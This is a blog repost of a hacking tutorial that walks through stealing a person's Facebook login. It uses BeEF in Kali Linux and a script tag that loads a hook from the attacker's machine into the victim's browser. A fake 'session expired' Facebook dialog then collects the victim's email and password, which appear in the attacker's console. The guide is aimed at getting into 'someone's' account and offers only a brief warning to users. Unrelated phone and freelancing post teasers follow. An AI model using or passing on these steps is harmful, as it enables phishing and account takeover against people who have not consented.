How to Get Facebook Credentials Without Hacking Facebook ||

-

How to Get Facebook Credentials Without Hacking Facebook 

 

 

Many people come to Null Byte looking to hack Facebook without the requisite skills to do so. Facebook is far from unhackable, but to do so, you will need some skills, and skill development is what Null Byte is all about.
Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you can get Facebook credentials. That's what this tutorial is all about. If you don't take the time to install Kali and learn a little about networking and Linux, this won't work for you—but if you are willing to take a little time to study here at Null Byte, you can probably gain access to someone's Facebook credentials very easily with this little trick.
(All Facebook users should take note of this if you don't want to get hacked.)

Step 1Install Kali (If You Haven't Done So Already)

The first step is to download and install Kali Linux. This can be done as a standalone operating system, a dual-boot with your Windows or Mac system, or in a virtual machine inside the operating system of your choice. No, this cannot be done with Windows! Windows, for all its strengths and ease of use, is not an appropriate hacking operating system.
Within Kali, there is an app called the Browser Exploitation Framework (BeEF). It is capable of helping you hack the victim's browser and take control of it. Once you have control of their browser, there are so many things you can do. One of them is to trick the user into giving away their Facebook credentials, which I'll show you here.

Step 2Open BeEF

Fire up Kali, and you should be greeted with a screen like below. You start up BeEF by clicking on the cow icon to the left of the Kali desktop.
When you click on it, it starts BeEF by opening a terminal.
BeEF is an application that runs in the background on a web server on your system that you access from a browser. Once BeEF is up and running, open your IceWeasel browser to access its interface. You can login to BeEF by using the username beef and the password beef.
You will then by greeted by BeEF's "Getting Started" screen.

Step 3Hook the Victim's Browser

This is the most critical—maybe even the most difficult part—of this hack. You must get the victim to click on a specially designed JavaScript link to "hook" their browser. This can be done in innumerable ways.
The simplest way is to simply embed the code into your website and entice the user to click on it. This might be done by such text as "Click here for more information" or "Click here to see the video." Use your imagination.
The script looks something like below. Embed it into a webpage, and when someone clicks on it, you own their browser! (Comment below if you have any questions on this; You might also use the MitMf to send the code to the user, but this requires more skill.)
<script src= "http://192.168.1.101:3000/hook.js&#8221 ; type= "text/javascript" ></script>
From here, I will be assuming you have "hooked" the victim's browser and are ready to own it.

Step 4Send a Dialog Box to the User

When you have hooked the victim's browser, its IP address, along with the operating system and browser type icons, will appear in the "Hooked Browsers" panel on the left. Here, I have simply used my own browser to demonstrate.
If we click on the hooked browser, it opens a BeEF interface on the right side. Notice that it gives us the details of the browser initially. It also provides us with a number of tabs. For our purposes here, we are interested in the 'Commands" tab.
Click on the "Commands" tab, then scroll down the "Modules Tree" until you come to "Social Engineering" and click to expand it. It will display numerous social engineering modules. Click on "Pretty Theft," which will open a "Module Results History" and "Pretty Theft" window.
This module enables you to send a pop-up window in the user's browser. In our case, we will be using the Facebook dialog box.
If we click on the "Dialog Type" box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type,then click on the "Execute" button the the bottom.

Step 5The Dialog Box Appears on the Target System

When you click "Execute" in BeEF, a dialog box will appear in the victim's browser like that below. It tells the victim that their Facebook session has expired and they need to re-enter their credentials.
Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.

Step 6Harvest the Credentials

Back on our system in the BeEf interface, we can see that the credentials appear in the "Command results" window. The victim has entered their email address "loveofmylife@gmail.com" and their password "sweetbippy" and they have been captured and presented to you in BeEF.
If you are really determined to get those Facebook credentials, it can be most definitely be done, and this is just one way of many methods (but probably the simplest).
If you you want to develop the skills to an even higher level, start studying here at Null Byte to master the most valuable skill set of the 21st century—hacking!

Comments

Post a Comment

Popular posts from this blog

Samsung Galaxy S8 & S8+ with Infinity Display, Iris Scanner & More—Here's Everything You Need to Know

-
Image
The new  Samsung Galaxy S8 and Galaxy S8+  phones were announced on March 29 at the  Samsung UNPACKED 2017  event. Preorders start on March 30 for the Korean tech giant's latest flagships, and sales officially begin in the US on April 21. Samsung will need a smooth release to win back consumer trust after  the Note7 mess , and it's already looking like the S8 won't disappoint. As already mentioned above, the Galaxy S8 will come in two different sizes, the 5.8-inch S8 and 6.2-inch S8+. Unlike last year's Galaxy S7 models, the S8 variants will only be available with curved "edge" screens. Preorder on March 30; Release on April 21 In the United States, the new Samsung Galaxy S8 and S8+ will be available for preordering on March 30, 2017, at 12:01 p.m. EDT (9:01 a.m. PDT). The phones will be available in stores starting April 21. You can pick one up at AT&T, Cricket Wireless, Sprint, Straight Talk Wireless, T-Mobile, US Cellular, and Verizon Wire...
Read more

How to Manage App Permissions on Marshmallow or Higher

-
Image
Android 6.0 Marshmallow added a new permissions system that can make your digital life much more secure. Unlike previous versions, apps now have to ask for your consent before they can access certain data, which puts you firmly in the driver's seat. As if that weren't enough, you can now revoke these app permissions after the fact—meaning if you change your mind about giving a certain app permission to access something, you can go back and change that rather easily. In an effort to get you more familiar with Android's new permissions system, I'll go over the basic concept of it all, then show you how to manage app permissions from within Android's settings menu. An app permission request on Marshmallow. App Permissions Explained All of the sensors and software in your Android device can be used to determine lots of different information. For instance, the GPS chip lets your device know exactly where on earth it is, and the Wi-Fi radio lets your dev...
Read more

How to Find Your First Web Development Client (or Become a FREELANCER)

-
Image
How to Find Your First Web Development Client (or Become a FREELANCER) Just because you have the skill doesn’t mean people will just fork over money to you. You need to do a little bit of work and sell yourself. You also need to put yourself in the right places to get opportunities. Now, as a web developer you have two choices. You can 1) try to land a full-time, on-site job with a company or 2) go the route of freelancing, and look for online gigs. I recommend freelancing. While it doesn’t afford the same guaranteed paycheck that a full-time job does, there are 3 huge benefits: Freedom:  No more clocking in and clocking out. You might still work the same hours (or more), but your schedule, location, and living circumstances are completely up to you. (Plus, no commuting, which saves your hours of time every week.) Money:  Once you become a good freelancer, you’ll have a better shot at making more money (than waiting for a measly 3% raise each year). Prestige:...
Read more